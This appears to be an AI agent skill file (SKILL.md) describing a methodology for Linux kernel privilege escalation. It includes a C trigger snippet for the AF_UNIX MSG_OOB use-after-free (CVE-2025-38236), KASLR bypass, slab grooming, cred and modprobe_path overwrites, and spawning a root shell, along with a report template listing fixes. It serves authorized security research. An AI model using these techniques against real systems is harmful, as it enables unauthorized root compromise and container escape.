exploiting-linux-kernel-vulnerabilities
npx mdskill add xalgord/xalgorix/exploiting-linux-kernel-vulnerabilities- During authorized kernel security assessments, local privilege-escalation (LPE) research, or sandbox-escape work where unprivileged userland can reach kernel code through a syscall, ioctl, socket family, netlink, or a vulnerable driver. - When triaging a kernel crash (`Oops`, `KASAN` splat, `GENERAL PROTECTION fault`, `BUG: KASAN: use-after-free`) and you need to determine whether the bug is a controllable UAF, OOB, double-free, or race rather than a pure null-deref DoS. - When a recent CVE (e.g., AF_UNIX `MSG_OOB` UAF / CVE-2025-38236, POSIX CPU-timers TOCTOU / CVE-2025-38352, ksmbd OOB write / CVE-2025-37947) is in scope and you must confirm reachability and exploitability on the target build. - As the methodology that turns a weak kernel primitive (a 1-byte read, a `+N` increment, a single freed object) into full kernel read/write/execute.
SKILL.md
---
name: exploiting-linux-kernel-vulnerabilities
description: Methodology for discovering and exploiting Linux kernel memory-corruption vulnerabilities (UAF, OOB read/write,
race/TOCTOU, type confusion) during authorized engagements, covering reachability analysis, building stable read/write
primitives from a single bug, defeating KASLR/SMEP/SMAP/KPTI, slab/buddy heap grooming, and pivoting to ring-0 code
execution or credential overwrite for local privilege escalation.
domain: cybersecurity
subdomain: binary-exploitation
tags:
- binary-exploitation
- linux-kernel
- exploit-development
version: '1.0'
author: xalgorix
license: Apache-2.0
---
# Exploiting Linux Kernel Vulnerabilities
## When to Use
- During authorized kernel security assessments, local privilege-escalation (LPE) research, or sandbox-escape work where
unprivileged userland can reach kernel code through a syscall, ioctl, socket family, netlink, or a vulnerable driver.
- When triaging a kernel crash (`Oops`, `KASAN` splat, `GENERAL PROTECTION fault`, `BUG: KASAN: use-after-free`) and you
need to determine whether the bug is a controllable UAF, OOB, double-free, or race rather than a pure null-deref DoS.
- When a recent CVE (e.g., AF_UNIX `MSG_OOB` UAF / CVE-2025-38236, POSIX CPU-timers TOCTOU / CVE-2025-38352, ksmbd
OOB write / CVE-2025-37947) is in scope and you must confirm reachability and exploitability on the target build.
- As the methodology that turns a weak kernel primitive (a 1-byte read, a `+N` increment, a single freed object) into
full kernel read/write/execute.
## Critical: Concepts/Steps Most Often Missed
- **A KASAN splat is not yet a primitive.** A reported UAF/OOB only proves corruption. You must show the freed/overflowed
object is *reclaimable into attacker-controlled memory* and that the corrupted field is *security-relevant* (a function
pointer, a length, a `cred*`, a list head). The AF_UNIX bug, for example, only matters once the dangling `oob_skb` is
reallocated into a pipe page you control.
- **Trusting the kernel version string.** Vendors backport both buggy and fixed patches. Check for the actual fixing
commit (e.g., `32ca245464e1` for the AF_UNIX OOB fix) and the relevant `CONFIG_*` gate (`CONFIG_AF_UNIX_OOB`,
`CONFIG_RANDOMIZE_KSTACK_OFFSET`, `CONFIG_INIT_STACK_ALL_ZERO`) rather than the release banner.
- **Ignoring usercopy hardening.** `__check_object_size()` / `__check_heap_object()` reject copies against `.text` and
specialized caches and return `-EFAULT` *without crashing*. Reads/writes against `.data`, `.bss`, vmemmap, per-CPU
vmalloc ranges, other threads' kernel stacks, and direct-map pages generally succeed — design the primitive around what
is allowed.
- **Forgetting modern mitigations.** SMEP blocks executing userland code in ring 0; SMAP blocks reading/writing userland
in kernel context (note: x86_64 disables SMAP *inside* `copy_to_user`); KPTI splits page tables; KASLR + per-syscall
`RANDOMIZE_KSTACK_OFFSET` randomize layout; CFI/`CONFIG_CFI_CLANG` constrains indirect calls. Each forces a data-only
or ROP-based path instead of naive `ret2usr`.
- **Non-deterministic heap state.** Skipping slab grooming makes reallocation unreliable. Drain per-CPU freelists, defeat
SLUB freelist randomization with mass spray, and account for per-CPU partial/page lists before expecting a freed object
to come back under your control.
### How to CONFIRM
Build the target kernel (or run the distro kernel) with KASAN under QEMU and attach `gdb` to the QEMU gdbstub
(`qemu -s -S`, then `target remote :1234`, load `vmlinux` symbols). Trigger the bug from a minimal C reproducer; a KASAN
report naming `use-after-free` / `out-of-bounds` at a known function **confirms** the corruption class and the faulting
object/cache. Then prove control: reallocate the object with a spray of known marker bytes and read them back through the
primitive. If your markers appear (e.g., `recv(MSG_OOB|MSG_PEEK)` returns the byte you planted), the primitive is real,
not just a crash.
## Workflow
### Step 1: Establish Reachability and Profile the Target
```bash
uname -r # kernel release (verify against the fixing commit, do not trust alone)
cat /boot/config-$(uname -r) | grep -E 'KASLR|SMEP|SMAP|KPTI|CFI|RANDOMIZE_KSTACK|AF_UNIX_OOB|INIT_STACK'
cat /proc/sys/kernel/kptr_restrict /proc/sys/kernel/perf_event_paranoid
ls -l /dev/ | grep -i <driver> # reachable device nodes for ioctl bugs
```
Confirm an unprivileged process can reach the vulnerable code path (syscall/ioctl/socket). Write a minimal C trigger:
```c
int s[2]; socketpair(AF_UNIX, SOCK_STREAM, 0, s); // example: AF_UNIX MSG_OOB UAF reachability
for (int i = 0; i < 2; i++) { send(s[1], "A", 1, MSG_OOB); recv(s[0], &b, 1, MSG_OOB); }
send(s[1], "A", 1, MSG_OOB);
recv(s[0], &b, 1, 0); // normal recv frees oob_skb
recv(s[0], &b, 1, MSG_OOB); // dangling u->oob_skb -> UAF
```
### Step 2: Convert the Bug into a Stable Primitive
```text
UAF -> reallocate freed object with controlled data (msg_msg, sk_buff, pipe_buffer, setxattr, user_key_payload)
OOB write -> overwrite an adjacent object's length/pointer to widen into arbitrary write
+N inc bug -> position a sensitive 64-bit value at the incremented offset (e.g., shift a length field by +4 GiB)
race/TOCTOU-> win the window with a stalling thread (mprotect/mmap-lock, MADV_DONTNEED hole) to freeze a copy mid-flight
```
Aim for two reusable primitives: an **arbitrary read** (leak) and an **arbitrary write** (control). The AF_UNIX case
yields a repeatable 1-byte read via `recv(MSG_OOB|MSG_PEEK)` and a `+1` increment write when `MSG_PEEK` is clear.
### Step 3: Defeat KASLR and Leak Kernel Base
```text
# Read a fixed-mapping IDT descriptor and subtract the known handler offset to recover kernel base:
CPU_ENTRY_AREA_RO_IDT_VADDR = 0xfffffe0000000000
kernel_base = leaked_idt_handler - known_offset_in_vmlinux
```
Use the read primitive to walk `.data` (kmem_cache bases), vmemmap (page type/freelist), and per-CPU vmalloc segments to
predict the next allocation address of key caches (`skbuff_head_cache`, `kmalloc-cg-192`). Walk `pgd_list` to locate the
current `mm_struct`'s root `pgd` when `mm_struct` itself is usercopy-blocked.
### Step 4: Pivot to Kernel R/W/X and Escalate
```text
# Data-only escalation (preferred, bypasses SMEP/KPTI/CFI):
1. Locate current task's cred via init_task / per-CPU current
2. Overwrite cred->uid/gid/euid/egid/cap_effective with 0 / full caps
3. Or overwrite struct file f_op, modprobe_path ("/sbin/modprobe" -> "/tmp/x"), or core_pattern
# PTE-overwrite escalation (full R/W/X):
1. Arrange a process-owned PTE page immediately after a controlled page (buddy adjacency in same 2 MiB block)
2. Use the OOB/overflow write to forge PTE entries -> map kernel physical memory RWX, disable SMEP/SMAP bits
```
```c
// after data-only cred overwrite:
setresuid(0,0,0); system("/bin/sh"); // demonstrate root
```
## Key Concepts
| Concept | Description |
|---------|-------------|
| **UAF (use-after-free)** | A freed object is still referenced; reclaiming it with controlled data hijacks behavior. |
| **OOB read/write** | Access past an allocation's bounds, corrupting/leaking an adjacent object's metadata. |
| **TOCTOU / race** | A check and use are separated; a stalling thread widens the window to win deterministically. |
| **Slab grooming** | Shaping SLUB per-CPU/partial freelists so a freed object is reclaimed by an attacker object. |
| **Buddy recycling** | Pushing a slab page back to the page allocator to reuse it as a pipe buffer, stack, or PTE page. |
| **KASLR bypass** | Leaking a fixed-mapping pointer (IDT) to recover the randomized kernel base. |
| **SMEP/SMAP/KPTI/CFI** | Mitigations that block ret2usr, userland access, page-table sharing, and indirect-call hijack. |
| **Data-only attack** | Escalating by overwriting `cred`, `modprobe_path`, or `core_pattern` instead of hijacking control flow. |
## Tools & Systems
| Tool | Purpose |
|------|---------|
| **QEMU + gdb (vmlinux)** | Boot the target kernel, attach to the gdbstub (`-s -S`), set breakpoints, inspect slab/stack. |
| **KASAN / KFENCE** | Sanitizer builds that pinpoint UAF/OOB with object and cache attribution. |
| **pwntools** | Userland exploit scaffolding, struct packing (`p64`), process control, payload staging. |
| **gef / pwndbg** | Kernel-aware gdb extensions: `slab`, `ksymaddr`, page-table walking, register/stack views. |
| **crash / drgn** | Live-kernel and vmcore introspection of `task_struct`, `cred`, `kmem_cache`, `pgd_list`. |
| **vmlinux-to-elf / ropper** | Recover symbols from a stripped kernel image; find ROP/JOP gadgets for stack pivots. |
| **syzkaller / trinity** | Fuzzers to discover and minimize reachable kernel bugs in scope. |
## Common Scenarios
### Scenario 1: AF_UNIX MSG_OOB UAF to LPE (CVE-2025-38236)
A flawed `manage_oob()` refactor leaves `u->oob_skb` dangling after a normal `recv()` frees the OOB SKB. Reclaiming the
slab page as a pipe buffer yields a repeatable 1-byte read and a `+4 GiB` increment of a length field; recycling the page
as a thread's kernel stack lets the increment inflate a `copy_page_from_iter()` length, overflowing into an adjacent PTE
page for arbitrary kernel R/W and root.
### Scenario 2: ioctl OOB write in a vendor driver
An unprivileged `ioctl` with an attacker-controlled length writes past a `kmalloc-512` object. Spray `msg_msg` objects to
place a controllable header adjacent, corrupt its size to build an arbitrary read, leak kernel base via IDT, then
overwrite `modprobe_path` to `/tmp/x` and trigger an unknown-binary exec to run a SUID-root helper.
### Scenario 3: TOCTOU in POSIX CPU timers (CVE-2025-38352)
A race between timer expiry and task teardown corrupts kernel state. A stalling thread (blocking on the mmap lock via
`mprotect()` over a `MADV_DONTNEED` hole) freezes the window so the corruption lands deterministically, converting a
flaky race into a reliable freed-object reuse.
### Scenario 4: Data-only cred overwrite under CFI
On a kernel with CFI + SMEP + KPTI, control-flow hijack is impractical. Instead, the arbitrary write is aimed at the
current task's `cred` structure, zeroing `uid/gid/euid/egid` and setting full `cap_effective`, granting root without
ever executing injected code or violating CFI.
## Output Format
```
## Linux Kernel Exploitation Finding
**Vulnerability**: Use-after-free in AF_UNIX MSG_OOB handling (CWE-416)
**CVE**: CVE-2025-38236
**Severity**: High (local privilege escalation / sandbox escape)
**Target**: Ubuntu 6.9.x (CONFIG_AF_UNIX_OOB=y, fixing commit 32ca245464e1 NOT backported)
**Reachable From**: Unprivileged user via AF_UNIX SOCK_STREAM socketpair (no CAP_* required)
### Primitive Proof
- Trigger: stacked zero-length OOB SKBs + normal recv() frees live u->oob_skb
- Read: recv(MSG_OOB|MSG_PEEK) returns planted marker byte from reclaimed pipe page (repeatable)
- Write: recv(MSG_OOB) increments consumed field at offset 0x44 (+1, scaled to +4 GiB at 0x40)
- KASLR: kernel base leaked via IDT @ 0xfffffe0000000000
### Exploitation Path
UAF -> pipe-page realloc -> 1-byte arbitrary read -> kernel base + pgd
-> recycle page as thread stack -> inflate copy length -> PTE-page overwrite -> kernel RWX
-> overwrite current cred -> uid=0. Demonstrated `id` => uid=0(root).
### Impact
Full local privilege escalation to root / container-to-host escape from an unprivileged context.
### Recommendation
1. Apply upstream fix 32ca245464e1 (revalidate SKBs in manage_oob); rebuild/redeploy.
2. Set CONFIG_AF_UNIX_OOB=n unless OOB is required; filter MSG_OOB/MSG_PEEK in seccomp sandbox profiles.
3. Enable CONFIG_RANDOMIZE_KSTACK_OFFSET, CONFIG_INIT_STACK_ALL_ZERO, CFI, SMEP/SMAP, KPTI.
4. Add slab freelist hardening (CONFIG_SLAB_FREELIST_RANDOM/HARDENED) and monitor abnormal pipe/page-table churn.
```